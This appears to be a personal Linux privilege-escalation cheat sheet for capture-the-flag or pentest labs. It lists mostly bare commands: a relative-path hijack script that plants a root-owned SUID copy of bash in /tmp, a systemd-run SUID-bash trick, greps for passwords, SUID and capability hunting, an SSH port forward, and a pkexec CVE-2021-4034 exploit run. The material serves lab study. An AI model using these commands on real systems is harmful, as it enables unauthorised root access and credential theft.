Linux Privilege Scalation

• Get your own local version of this checklist here:

Checklist - Linux Privilege EscalationHackTricks

By Carlos Palop

---

sudo Permissions Chaining

Lists allowed commands

sudo -l

---

Relative Path Hijacking

• Sometimes is possible to run scripts as sudo that call others scripts within the script.

• When this scripts are called by a relative path is possible to create a malicious script on a directory with write permissions.

• This commands creates a script called initdb.sh that well called will copy bash to a file called shellie in the /tmp folder:

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/shellie\nchown root:root /tmp/shellie\nchmod 6777 /tmp/shellie' | tee initdb.sh

• Once the malicious script is executed by the vulnerable script, you just need to execute the shell from the /tmp folder to become root:

/tmp/shellie -p 

Netstat

#Option 1
netstat -l

#Ports
netstat -nltp

#More
netstat -rn

Look for files

#SUID
find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -or -perm -2000 2>/dev/null
#Binaries con capabilities
getcap -r / 2>/dev/null

#Extra info about bin process 
**getfacl** 

#Passwords
grep -iR "pass" *
grep password .*.* -r
#File
grep -ir cri-o . 2>/dev/null

#Look for a specific file
find / -name lcars 2>/dev/null
find / -name root.txt 2>/dev/null

#Inside a file
cat /etc/zabbix/zabbix_server.conf | grep -Ev "^#" | grep .

#Check libraries
ltrace

#Looking for 32 characters file
#hex
grep -aPo '[a-fA-F0-9]{32}' /dev/sdb
#string 32 chars
strings /dev/sdb -n 32

User Privileges

Check user root privileges —> sudo -l

Port Forwarding

ssh -L {TARGETPORT}:127.0.01:8000 [sau@](<mailto:sau@10.10.11.214>){TARGETIP}

Symbolic Link

ln -s /root/root.txt t.trace.db

Common Vectors

#systemd-run + bash -p
systemd-run chmod u+s /bin/bash
bash -p

#pkexec
python3 CVE-2021-4034.py

Flash drives

#Enumerate mounted disks
mount
#more
lsblk

SUDO

#Interective shell
sudo -i
#su vuln
sudo su -